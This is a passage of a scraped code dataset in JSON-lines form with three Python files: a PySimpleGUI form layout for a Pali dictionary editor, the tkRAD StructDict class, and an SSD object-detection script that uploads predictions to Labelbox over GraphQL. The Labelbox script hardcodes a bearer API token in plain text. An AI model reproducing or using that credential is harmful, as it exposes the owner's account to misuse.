text_color=\"red\")\n ],\n [\n sg.Text(\"phonetic\", size=(15, 1)),\n sg.Multiline(\n key=\"phonetic\", size=(50, 2), no_scrollbar=True,\n tooltip=\"List of all phonetic changes\"),\n sg.Text(\n \"\", key=\"phonetic_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"compound_type\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n COMPOUND_TYPE_VALUES,\n key=\"compound_type\", size=(49, 1),\n tooltip=\"Type of samāsa\")),\n sg.Text(\n \"\", key=\"compound_type_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"compound_construction*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"compound_construction\", size=(50, 1),\n enable_events=True,\n tooltip=\"Construction of the samāsa, showing case relationship\")),\n sg.Text(\n \"\", key=\"compound_construction_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.Input(\n key=\"bold_cc\", size=(20, 1),\n tooltip=\"Add bold to the case ending\"),\n sg.Button(\"Bold\", key=\"bold_cc_button\", font=(None, 13)),\n ],\n [\n sg.Text(\"non_root_in_comps\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"non_root_in_comps\", size=(50, 1),\n tooltip=\"\")),\n sg.Text(\n \"\", key=\"non_root_in_comps_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"antonym\", size=(15, 1)),\n sg.Input(\n key=\"antonym\", size=(50, 1),\n tooltip=\"Word(s) with the opposite meaning\"),\n sg.Text(\n \"\", key=\"antonym_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"synonym*\", size=(15, 1)),\n sg.Input(\n key=\"synonym\", size=(50, 1), enable_events=True,\n tooltip=\"Will get automatically filled\"),\n sg.Text(\n \"\", key=\"synonym_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"variant\", size=(15, 1)),\n sg.Input(\n key=\"variant\", size=(50, 1), enable_events=True,\n tooltip=\"Add variant readings in text\"),\n sg.Text(\n \"\", key=\"variant_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"commentary\", size=(15, 5)),\n sg.Multiline(\n key=\"commentary\", size=(50, 5), no_scrollbar=True,\n tooltip=\"Add commentary definition\"),\n sg.Text(\n \"\", key=\"commentary_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"search for\", size=(15, 1)),\n sg.Input(\n \"\", key=\"search_for\", size=(20, 1),\n enable_events=True,\n tooltip=\"Search for BOLD words in commentaries\"),\n sg.Input(\n \"\", key=\"contains\", size=(17, 1),\n tooltip=\"Search for NOT BOLD words in commentaries\"),\n sg.Button(\n \"Search\", key=\"defintions_search_button\", font=(None, 13)),\n sg.Button(\n \"Clean\", key=\"commentary_clean\", font=(None, 13)),\n sg.Text(\n \"\", key=\"search_for_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"notes\", size=(15, 1)),\n sg.Input(\n key=\"notes\", size=(50, 41), tooltip=\"Add additional notes\"),\n sg.Text(\n \"\", key=\"notes_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"non_ia\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"non_ia\", size=(50, 41),\n tooltip=\"Cognate of the word in non Indo-Aryan languages?\"),\n ),\n sg.Text(\n \"\", key=\"non_ia_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sanskrit*\", size=(15, 1)),\n sg.Input(\n key=\"sanskrit\", size=(50, 1), enable_events=True,\n tooltip=\"Cogante of the word in Sanskrit or BHS.\"),\n sg.Text(\n \"\", key=\"sanskrit_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"cognate\", size=(15, 1)),\n sg.Input(\n key=\"cognate\", size=(50, 1),\n tooltip=\"Cognate words in English\"),\n sg.Text(\n \"\", key=\"cognate_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"link\", size=(15, 1)),\n sg.Input(\n key=\"link\", size=(50, 1),\n tooltip=\"Add a wikipedia link\"),\n sg.Text(\n \"\", key=\"link_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"source_1*\", size=(15, 1)),\n sg.Input(\n key=\"source_1\", size=(50, 1), enable_events=True,\n tooltip=\"Sutta code using DPR system\"),\n sg.Text(\n \"\", key=\"source_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sutta_1*\", size=(15, 1)),\n sg.Input(\n key=\"sutta_1\", size=(50, 1), enable_events=True,\n tooltip=\"Sutta name\"),\n sg.Text(\n \"\", key=\"sutta_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"example_1*\", size=(15, 5)),\n sg.Multiline(\n key=\"example_1\", size=(49, 5),\n enable_events=True,\n tooltip=\"Sutta example. Add all sandhi apostrophes.\"),\n sg.Text(\n \"\", key=\"example_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.Input(\n key=\"bold_1\", size=(20, 1),\n tooltip=\"Bold the word\"),\n sg.Button(\"Bold\", key=\"bold_1_button\", font=(None, 13)),\n sg.Button(\n \"Another Eg\",\n key=\"another_eg_1\",\n tooltip=\"Find another sutta example\",\n font=(None, 13)),\n sg.Button(\"Lower\", key=\"example_1_lower\", font=(None, 13)),\n sg.Button(\"Clean\", key=\"example_1_clean\", font=(None, 13)),\n sg.Text(\"\", key=\"bold_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"source_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"source_2\", size=(50, 1),\n tooltip=\"Sutta code using DPR system\")),\n sg.Text(\n \"\", key=\"source_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sutta_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"sutta_2\", size=(50, 1),\n tooltip=\"Sutta name\")),\n sg.Text(\n \"\", key=\"sutta_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"example_2\", size=(15, 5)),\n sg.pin(\n sg.Multiline(\n key=\"example_2\", size=(49, 5),\n tooltip=\"Sutta example. Add all sandhi apostrophes.\")),\n sg.Text(\n \"\", key=\"example_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"bold_2\", size=(20, 1),\n tooltip=\"Bold the word\")),\n sg.pin(\n sg.Button(\"Bold\", key=\"bold_2_button\", font=(None, 13))),\n sg.pin(\n sg.Button(\n \"Another Eg\", key=\"another_eg_2\", font=(None, 13),\n tooltip=\"Find another sutta example\")),\n sg.pin(\n sg.Button(\"Lower\", key=\"example_2_lower\", font=(None, 13))),\n sg.pin(\n sg.Button(\"Clean\", key=\"example_2_clean\", font=(None, 13))),\n sg.Text(\"\", key=\"bold_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family set*\", size=(15, 1)),\n CompletionCombo(\n FAMILY_SET_VALUES, key=\"family_set\",\n size=(49, 1),\n tooltip=\"Add to sets\"),\n sg.Text(\"\", key=\"family_set_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"stem pattern*\", size=(15, 1)),\n sg.Input(\n key=\"stem\", size=(30, 1), justification=\"r\",\n enable_events=True,\n tooltip=\"Stem of the word, without the pattern\"),\n CompletionCombo(\n PATTERN_VALUES, key=\"pattern\",\n size=(12, 1), tooltip=\"Inflection pattern of the word\"),\n sg.Input(\n origin, key=\"origin\", size=(6, 1),\n tooltip=\"Where does this word data come from?\"),\n sg.Text(\n \"\", key=\"stem_error\", size=(50, 1), text_color=\"red\"),\n sg.Text(\n \"\", key=\"pattern_error\", size=(50, 1), text_color=\"red\")\n ],\n ]\n\n tab_edit_dpd = [\n [\n sg.Column(\n add_word_layout,\n scrollable=True,\n vertical_scroll_only=True,\n expand_y=True,\n expand_x=True,\n size=(None, 850),\n ),\n ],\n [\n sg.HSep(),\n ],\n [\n # db buttons\n sg.Text(\"db buttons\", size=(15, 1)),\n sg.Button(\n \"Clone\", tooltip=\"Clone a word from the db\"),\n sg.Input(\n key=\"word_to_clone_edit\",\n size=(15, 1),\n enable_events=True,\n tooltip=\"Enter id or pali_1\"\n ),\n sg.Button(\n \"Edit\", key=\"edit_button\", tooltip=\"Edit a word in the db\"),\n sg.Button(\n \"Test\", key=\"test_internal_button\",\n tooltip=\"Run internal tests\"),\n sg.Button(\n \"Update db\", key=\"update_db_button1\",\n tooltip=\"Add a new word or update existing word in the db\",\n visible=primary_user),\n sg.Button(\n \"Update DB\", key=\"update_db_button2\",\n tooltip=\"Add a new word or update existing word in the db\",\n visible=not primary_user),\n sg.Button(\n \"Delete\", key=\"delete_button\",\n tooltip=\"Delete a word from the db. Careful!\",\n mouseover_colors=\"red\",\n visible=primary_user),\n sg.Button(\n \"Update Sandhi\", key=\"update_sandhi_button\",\n tooltip=\"Update list of words with sandhi apostophes\"),\n sg.Button(\n \"Log\", key=\"open_corrections_button\",\n tooltip=\"open corrections tsv in code\",\n visible=not primary_user),\n ],\n [\n # gui buttons\n sg.Text(\"gui buttons\", size=(15, 1)),\n sg.Button(\n \"Open Tests\", key=\"open_tests_button\",\n tooltip=\"Open TSV file of internal tests\"),\n sg.Button(\n \"Debug\", key=\"debug_button\",\n tooltip=\"Print the current values in the terminal\"),\n sg.Button(\n \"Stash\", key=\"stash_button\",\n tooltip=\"Stash the word to edit it again later\"),\n sg.Button(\n \"Unstash\", key=\"unstash_button\",\n tooltip=\"Unstash a word to edit it again\"),\n sg.Button(\n \"Summary\", key=\"summary_button\",\n tooltip=\"See a summary of filled fields\"),\n sg.Button(\n \"Save\", key=\"save_state_button\",\n tooltip=\"Save the current state of the GUI\"),\n sg.Button(\n \"Clear\", key=\"clear_button\", tooltip=\"Clear all the fields\"),\n sg.Button(\n \"Save and Close\", key=\"save_and_close_button\",\n tooltip=\"Save the current state, backup to tsv and close\"),\n ]\n ]\n\n return tab_edit_dpd\n","repo_name":"digitalpalidictionary/dpd-db","sub_path":"gui/tab_edit_dpd.py","file_name":"tab_edit_dpd.py","file_ext":"py","file_size_in_byte":25681,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"8140671108","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n tkRAD - tkinter Rapid Application Development library\n\n (c) 2013+ Raphaël SEBAN \n\n This program is free software: you can redistribute it and/or\n modify it under the terms of the GNU General Public License as\n published by the Free Software Foundation, either version 3 of\n the License, or (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n General Public License for more details.\n\n You should have received a copy of the GNU General Public\n License along with this program.\n\n If not, see: http://www.gnu.org/licenses/\n\"\"\"\n\n\n\n# ========================= STANDALONE MODULE ==========================\n\n\n\nclass StructDict (dict):\n r\"\"\"\n generic 'class structure' dictionary;\n\n supports item value get / set overrides;\n\n items should be of same 'class structure' type;\n \"\"\"\n\n\n\n def __getitem__ (self, key):\n r\"\"\"\n item value getter;\n\n overrides to item.getter() if @key exists and is\n\n of item type;\n\n behaves as dict() otherwise i.e. returns dict[@key];\n \"\"\"\n\n _item = super().__getitem__(key)\n\n if isinstance(_item, self.item_type):\n\n return getattr(_item, self.item_value_getter)()\n\n else:\n\n return _item\n\n # end if\n\n # end def\n\n\n\n def __init__ (self, *args, **kw):\n r\"\"\"\n class constructor;\n\n implements @item_type class member:\n\n dict item 'class type' for item value override support;\n\n implements @item_value_getter class member:\n\n name of item class method for getting internal value;\n\n default name value is \"get_value\";\n\n implements @item_value_setter class member:\n\n name of item class method for setting internal value;\n\n default name value is \"set_value\";\n \"\"\"\n\n # super class inits\n\n super().__init__(*args, **kw)\n\n # member inits\n\n self.item_type = None\n\n self.item_value_getter = \"get_value\"\n\n self.item_value_setter = \"set_value\"\n\n # end def\n\n\n\n def __setitem__ (self, key, value):\n r\"\"\"\n item value setter;\n\n overrides to item.setter(@value) if @key exists and is\n\n of 'item type' type;\n\n behaves as dict() otherwise i.e. dict[@key] = @value;\n \"\"\"\n\n _item = super().get(key)\n\n if isinstance(_item, self.item_type):\n\n getattr(_item, self.item_value_setter)(value)\n\n else:\n\n super().__setitem__(key, value)\n\n # end if\n\n # end def\n\n\n\n def flatten (self):\n r\"\"\"\n returns a new dict() of item.value instead of item itself;\n\n this provides a \"flat\" dict of (key, value) pairs;\n\n keeps current items() UNTOUCHED;\n \"\"\"\n\n # inits\n\n _dict = dict()\n\n # loop on items\n\n for _key in self.keys():\n\n # flattens item to its value\n\n _dict[_key] = self.get(_key)\n\n # end for\n\n # return new dict() object\n\n return _dict\n\n # end def\n\n\n\n def get (self, key, default = None):\n r\"\"\"\n item value getter;\n\n overrides to item.getter() if @key exists and\n\n is of 'item type' type;\n\n behaves as dict() otherwise i.e. dict.get(@key, @default);\n \"\"\"\n\n _item = super().get(key, default)\n\n if isinstance(_item, self.item_type):\n\n return getattr(_item, self.item_value_getter)()\n\n else:\n\n return _item\n\n # end if\n\n # end def\n\n\n\n def get_item (self, key, default = None):\n r\"\"\"\n returns dict item along @key no matter what it is like;\n\n returns @default if @key does not exist in dict;\n\n same as dict.get(@key, @default);\n \"\"\"\n\n return super().get(key, default)\n\n # end def\n\n\n\n def get_value (self, key, default = None):\n r\"\"\"\n alias method name for .get(...);\n\n defined only for commodity and for code readability;\n \"\"\"\n\n return self.get(key, default)\n\n # end def\n\n\n\n @property\n def item_value_getter (self):\n r\"\"\"\n @property handler for 'item value getter' class member;\n\n 'item value getter' MUST be of plain string type;\n\n raises TypeError otherwise;\n \"\"\"\n\n return self.__item_value_getter\n\n # end def\n\n\n\n @item_value_getter.setter\n def item_value_getter (self, getter):\n\n if getter and isinstance(getter, str):\n\n self.__item_value_getter = getter\n\n else:\n\n raise TypeError(\n\n \"item value getter must be of PLAIN char string type.\"\n )\n\n # end if\n\n # end def\n\n\n\n @item_value_getter.deleter\n def item_value_getter (self):\n\n del self.__item_value_getter\n\n # end def\n\n\n\n @property\n def item_value_setter (self):\n r\"\"\"\n @property handler for 'item value setter' class member;\n\n 'item value setter' MUST be of plain string type;\n\n raises TypeError otherwise;\n \"\"\"\n\n return self.__item_value_setter\n\n # end def\n\n\n\n @item_value_setter.setter\n def item_value_setter (self, setter):\n\n if setter and isinstance(setter, str):\n\n self.__item_value_setter = setter\n\n else:\n\n raise TypeError(\n\n \"item value setter must be of PLAIN char string type.\"\n )\n\n # end if\n\n # end def\n\n\n\n @item_value_setter.deleter\n def item_value_setter (self):\n\n del self.__item_value_setter\n\n # end def\n\n\n\n def set (self, key, value):\n r\"\"\"\n 'item value' setter;\n\n overrides to item.setter(@value) if @key exists and is\n\n of 'item type' type;\n\n behaves as dict() otherwise i.e. dict[@key] = @value;\n \"\"\"\n\n self.__setitem__(key, value)\n\n # end def\n\n\n\n def set_item (self, key, value):\n r\"\"\"\n real dict item setter;\n\n sets dict[@key] = @value no matter what it is like;\n \"\"\"\n\n super().__setitem__(key, value)\n\n # end def\n\n\n\n def set_value (self, key, value):\n r\"\"\"\n alias method name for .set(...);\n\n defined only for commodity and for code readability;\n \"\"\"\n\n self.set(key, value)\n\n # end def\n\n\n# end class StructDict\n","repo_name":"muxuezi/tkRAD","sub_path":"core/struct_dict.py","file_name":"struct_dict.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"26989517411","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Object Detection with SSD\n# ### Here we demostrate detection on example images using SSD with PyTorch\n\n# In[192]:\n\n\nimport os\nimport sys\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nimport torch\nimport torch.nn as nn\nfrom pascal_voc_writer import Writer\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport numpy as np\nimport cv2\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\nfrom ssd import build_ssd\n\n\n# In[193]:\n\n\nimport json\nfrom graphqlclient import GraphQLClient\nclient = GraphQLClient('https://api.labelbox.com/graphql')\nclient.inject_token('Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjanVvMG9kOHUzMmV4MDgxNzRxMW8za2ZtIiwib3JnYW5pemF0aW9uSWQiOiJjanVvMG9kOGM0MmVpMDg3MXc1bWJvcjUxIiwiYXBpS2V5SWQiOiJjanVwZGkyOWt3N2hzMDg3MTZ3dTh6ZW1kIiwiaWF0IjoxNTU1NzU2OTIwLCJleHAiOjIxODY5MDg5MjB9._m24Q4hVQKIJZVi61-y7bqw5iX1he37zSca1VmW027g')\n\ndef me():\n res_str = client.execute(\"\"\"\n query GetUserInformation {\n user {\n id\n organization{\n id\n }\n }\n }\n \"\"\")\n\n res = json.loads(res_str)\n return res['data']['user']\n\n\ndef createDataset(name):\n res_str = client.execute(\"\"\"\n mutation CreateDatasetFromAPI($name: String!) {\n createDataset(data:{\n name: $name\n }){\n id\n }\n }\n \"\"\", {'name': name})\n\n res = json.loads(res_str)\n return res['data']['createDataset']['id']\n\n\ndef createProject(name):\n res_str = client.execute(\"\"\"\n mutation CreateProjectFromAPI($name: String!) {\n createProject(data:{\n name: $name\n }){\n id\n }\n }\n \"\"\", {'name': name})\n\n res = json.loads(res_str)\n return res['data']['createProject']['id']\n\n\ndef completeSetupOfProject(project_id, dataset_id, labeling_frontend_id):\n res_str = client.execute(\"\"\"\n mutation CompleteSetupOfProject($projectId: ID!, $datasetId: ID!, $labelingFrontendId: ID!){\n updateProject(\n where:{\n id:$projectId\n },\n data:{\n setupComplete: \"2018-11-29T20:46:59.521Z\",\n datasets:{\n connect:{\n id:$datasetId\n }\n },\n labelingFrontend:{\n connect:{\n id:$labelingFrontendId\n }\n }\n }\n ){\n id\n }\n }\n \"\"\", {\n 'projectId': project_id,\n 'datasetId': dataset_id,\n 'labelingFrontendId': labeling_frontend_id\n })\n\n res = json.loads(res_str)\n return res['data']['updateProject']['id']\n\n\ndef configure_interface_for_project(ontology, project_id, interface_id, organization_id):\n res_str = client.execute(\"\"\"\n mutation ConfigureInterfaceFromAPI($projectId: ID!, $customizationOptions: String!, $labelingFrontendId: ID!, $organizationId: ID!) {\n createLabelingFrontendOptions(data:{\n customizationOptions: $customizationOptions,\n project:{\n connect:{\n id: $projectId\n }\n }\n labelingFrontend:{\n connect:{\n id:$labelingFrontendId\n }\n }\n organization:{\n connect:{\n id: $organizationId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'projectId': project_id,\n 'customizationOptions': json.dumps(ontology),\n 'labelingFrontendId': interface_id,\n 'organizationId': organization_id,\n })\n\n res = json.loads(res_str)\n return res['data']['createLabelingFrontendOptions']['id']\n\n\ndef get_image_labeling_interface_id():\n res_str = client.execute(\"\"\"\n query GetImageLabelingInterfaceId {\n labelingFrontends(where:{\n iframeUrlPath:\"https://image-segmentation-v4.labelbox.com\"\n }){\n id\n }\n }\n \"\"\")\n\n res = json.loads(res_str)\n return res['data']['labelingFrontends'][0]['id']\n\n\ndef create_prediction_model(name, version):\n res_str = client.execute(\"\"\"\n mutation CreatePredictionModelFromAPI($name: String!, $version: Int!) {\n createPredictionModel(data:{\n name: $name,\n version: $version\n }){\n id\n }\n }\n \"\"\", {\n 'name': name,\n 'version': version\n })\n\n res = json.loads(res_str)\n return res['data']['createPredictionModel']['id']\n\ndef attach_prediction_model_to_project(prediction_model_id, project_id):\n res_str = client.execute(\"\"\"\n mutation AttachPredictionModel($predictionModelId: ID!, $projectId: ID!){\n updateProject(where:{\n id: $projectId\n }, data:{\n activePredictionModel:{\n connect:{\n id: $predictionModelId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'predictionModelId': prediction_model_id,\n 'projectId': project_id\n })\n\n res = json.loads(res_str)\n return res['data']['updateProject']['id']\n\n\n# Make sure you pass in label as string\n# json.dumps(label_json)\ndef create_label(label, project_id, data_row_id):\n res_str = client.execute(\"\"\"\n mutation CreateLabelFromApi($label: String!, $projectId: ID!, $dataRowId: ID!){\n createLabel(data:{\n label:$label,\n secondsToLabel:0,\n project:{\n connect:{\n id:$projectId\n }\n }\n dataRow:{\n connect:{\n id:$dataRowId\n }\n }\n type:{\n connect:{\n name:\"Any\"\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'label': label,\n 'projectId': project_id,\n 'dataRowId': data_row_id\n })\n\n res = json.loads(res_str)\n return res['data']['createLabel']['id']\n\ndef create_prediction(label, prediction_model_id, project_id, data_row_id):\n res_str = client.execute(\"\"\"\n mutation CreatePredictionFromAPI($label: String!, $predictionModelId: ID!, $projectId: ID!, $dataRowId: ID!) {\n createPrediction(data:{\n label: $label,\n predictionModelId: $predictionModelId,\n projectId: $projectId,\n dataRowId: $dataRowId,\n }){\n id\n }\n }\n \"\"\", {\n 'label': label,\n 'predictionModelId': prediction_model_id,\n 'projectId': project_id,\n 'dataRowId': data_row_id\n })\n\n res = json.loads(res_str)\n return res['data']['createPrediction']['id']\n\n\ndef create_datarow(row_data, external_id, dataset_id):\n res_str = client.execute(\"\"\"\n mutation CreateDataRowFromAPI(\n $rowData: String!,\n $externalId: String,\n $datasetId: ID!\n ) {\n createDataRow(data:{\n externalId: $externalId,\n rowData: $rowData,\n dataset:{\n connect:{\n id: $datasetId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'rowData': row_data,\n 'externalId': external_id,\n 'datasetId': dataset_id\n })\n\n res = json.loads(res_str)\n return res['data']['createDataRow']['id']\n\n\n# ## Build SSD300 in Test Phase\n# 1. Build the architecture, specifyingsize of the input image (300),\n# and number of object classes to score (21 for VOC dataset)\n# 2. Next we load pretrained weights on the VOC0712 trainval dataset \n\n# In[194]:\n\n\nnet = build_ssd('test', 300, 21) # initialize SSD\nnet.load_weights('../weights/ssd300_COCO_20000.pth')\n\n\n# ## Load Image \n# ### Here we just load a sample image from the VOC07 dataset \n\n# In[220]:\n\n\ndef video_to_frames(video, path_output_dir):\n # extract frames from a video and save to directory as 'x.png' where\n # x is the frame index\n vidcap = cv2.VideoCapture(video)\n count = 0\n while vidcap.isOpened():\n success, image = vidcap.read()\n if success :\n if count % 100 == 0:\n cv2.imwrite(os.path.join(path_output_dir, '%d.jpeg') % count, image)\n count += 1\n count+=1\n else:\n break\n cv2.destroyAllWindows()\n vidcap.release()\n#video_to_frames(\"C:/diploma/video.avi\",\"C:/diploma/frames/\")\n#source = 'C:/diploma/ssd-pytorch/frames/'\n#for root, dirs, filenames in os.walk(source):\n#for f in filenames:\nnet = build_ssd('test', 300, 21) # initialize SSD\nnet.load_weights('../weights/ssd300_COCO_20000.pth')\nfor image_number in [23400,16600,15100,15400,16900,23200,23100,22900,11400,11300,700,600,2500,8300,10500]:\n image = cv2.imread('C:/diploma/ssd-pytorch/frames/{}.jpeg'.format(image_number), cv2.IMREAD_COLOR) # uncomment if dataset not downloaded\n height, width, channels = image.shape\n #writer = Writer('karpin.jpg',width,height)\n get_ipython().run_line_magic('matplotlib', 'inline')\n from matplotlib import pyplot as plt\n from data import VOCDetection, VOC_ROOT, VOCAnnotationTransform\n # here we specify year (07 or 12) and dataset ('test', 'val', 'train') \n #testset = VOCDetection(VOC_ROOT, [('2007', 'val')], None, VOCAnnotationTransform())\n #img_id = 97\n #image = testset.pull_image(img_id)\n rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # View the sampled input image before transform\n plt.figure(figsize=(10,10))\n plt.imshow(rgb_image)\n plt.show()\n x = cv2.resize(image, (300, 300)).astype(np.float32)\n x -= (104.0, 117.0, 123.0)\n x = x.astype(np.float32)\n #x = x[:, :, ::-1].copy()\n plt.imshow(x)\n x = torch.from_numpy(x).permute(2, 0, 1)\n xx = Variable(x.unsqueeze(0)) # wrap tensor in Variable\n if torch.cuda.is_available():\n xx = xx.cuda()\n y = net(xx)\n from data import VOC_CLASSES as labels\n top_k=10\n\n plt.figure(figsize=(10,10))\n colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\n plt.imshow(rgb_image) # plot the image for matplotlib\n currentAxis = plt.gca()\n\n detections = y.data\n # scale each detection back up to the image\n scale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\n data = [{\n \"prediction_label\": {\n \"person\": [\n ]\n },\n \"image_url\": \"http://192.168.1.48:8000/{}.jpeg\".format(image_number),\n \"external_id\": \"local_image{}\".format(image_number)\n }\n ]\n for i in range(detections.size(1)):\n j = 0\n while detections[0,i,j,0] >= 0.6:\n #print(detections[0,i,j,0])\n score = detections[0,i,j,0]\n label_name = labels[i-1]\n display_txt = '%s: %.2f'%(label_name, score)\n pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n data[0]['prediction_label']['person'].append({'geometry':[{\"x\":int(pt[0]),\"y\":int(pt[1]) },\n {\"x\": int(pt[2]), \"y\": int(pt[3])}]})\n color = colors[i]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 'alpha':0.5})\n j+=1\n image_number += 100\n user_info = me()\n org_id = user_info['organization']['id']\n\n project_id = \"cjvak22atnklk0800eifi2yct\"\n dataset_id = \"cjvaluw3lntxh08006u2jkkjw\"\n\n interface_id = get_image_labeling_interface_id()\n ontology = {\n \"tools\": [\n {\n \"color\": \"navy\",\n \"tool\": \"regtangle\",\n \"name\": \"Football\"\n }\n ]\n }\n\n configure_interface_for_project(\n ontology, project_id, interface_id, org_id)\n completeSetupOfProject(project_id, dataset_id, interface_id)\n print('Attached Dataset and Interface to Created Project')\n\n prediction_model_id = create_prediction_model('Ollie Example Model', 1)\n attach_prediction_model_to_project(prediction_model_id, project_id)\n\n print('Created and attached prediction model: %s' % (prediction_model_id))\n\n for row in data:\n data_row_id = create_datarow(row['image_url'], row['external_id'], dataset_id)\n print('Created DataRow: %s' % (data_row_id))\n\n # prediction_id = create_prediction(json.dumps(row['prediction_label']), prediction_model_id, project_id, data_row_id)\n prediction_id = create_label(json.dumps(row['prediction_label']), project_id, data_row_id)\n print('Created Prediction: %s %s' , (prediction_id), (data_row_id))\n\n\n# ## Pre-process the input. \n# #### Using the torchvision package, we can create a Compose of multiple built-in transorm ops to apply \n# For SSD, at test time we use a custom BaseTransform callable to\n# resize our image to 300x300, subtract the dataset's mean rgb values, \n# and swap the color channels for input to SSD300.\n\n# In[210]:\n\n\nx = cv2.resize(image, (300, 300)).astype(np.float32)\nx -= (104.0, 117.0, 123.0)\nx = x.astype(np.float32)\n#x = x[:, :, ::-1].copy()\nplt.imshow(x)\nx = torch.from_numpy(x).permute(2, 0, 1)\n\n\n# ## SSD Forward Pass\n# ### Now just wrap the image in a Variable so it is recognized by PyTorch autograd\n\n# In[211]:\n\n\nxx = Variable(x.unsqueeze(0)) # wrap tensor in Variable\nif torch.cuda.is_available():\n xx = xx.cuda()\ny = net(xx)\n\n\n# ## Parse the Detections and View Results\n# Filter outputs with confidence scores lower than a threshold \n# Here we choose 60% \n\n# In[215]:\n\n\nfrom data import VOC_CLASSES as labels\ntop_k=10\n\nplt.figure(figsize=(10,10))\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nplt.imshow(rgb_image) # plot the image for matplotlib\ncurrentAxis = plt.gca()\n\ndetections = y.data\n# scale each detection back up to the image\nscale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\ndata = [{\n \"prediction_label\": {\n \"person\": [\n ]\n },\n \"image_url\": \"http://192.168.1.48:8000/{}.jpeg\".format(image_number),\n \"external_id\": \"local_image\"\n }\n ]\nfor i in range(detections.size(1)):\n j = 0\n while detections[0,i,j,0] >= 0.6:\n #print(detections[0,i,j,0])\n score = detections[0,i,j,0]\n label_name = labels[i-1]\n display_txt = '%s: %.2f'%(label_name, score)\n pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n data[0]['prediction_label']['person'].append({'geometry':[{\"x\":int(pt[0]),\"y\":int(pt[1]) },\n {\"x\": int(pt[2]), \"y\": int(pt[3])}]})\n color = colors[i]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 'alpha':0.5})\n j+=1\n\nuser_info = me()\norg_id = user_info['organization']['id']\n\nproject_id = \"cjvak22atnklk0800eifi2yct\"\ndataset_id = \"cjvaluw3lntxh08006u2jkkjw\"\n\ninterface_id = get_image_labeling_interface_id()\nontology = {\n \"tools\": [\n {\n \"color\": \"navy\",\n \"tool\": \"regtangle\",\n \"name\": \"Football\"\n }\n ]\n }\n\nconfigure_interface_for_project(\nontology, project_id, interface_id, org_id)\ncompleteSetupOfProject(project_id, dataset_id, interface_id)\nprint('Attached Dataset and Interface to Created Project')\n\nprediction_model_id = create_prediction_model('Ollie Example Model', 1)\nattach_prediction_model_to_project(prediction_model_id, project_id)\n\nprint('Created and attached prediction model: %s' % (prediction_model_id))\n\nfor row in data:\n data_row_id = create_datarow(row['image_url'], row['external_id'], dataset_id)\n print('Created DataRow: %s' % (data_row_id))\n\n# prediction_id = create_prediction(json.dumps(row['prediction_label']), prediction_model_id, project_id, 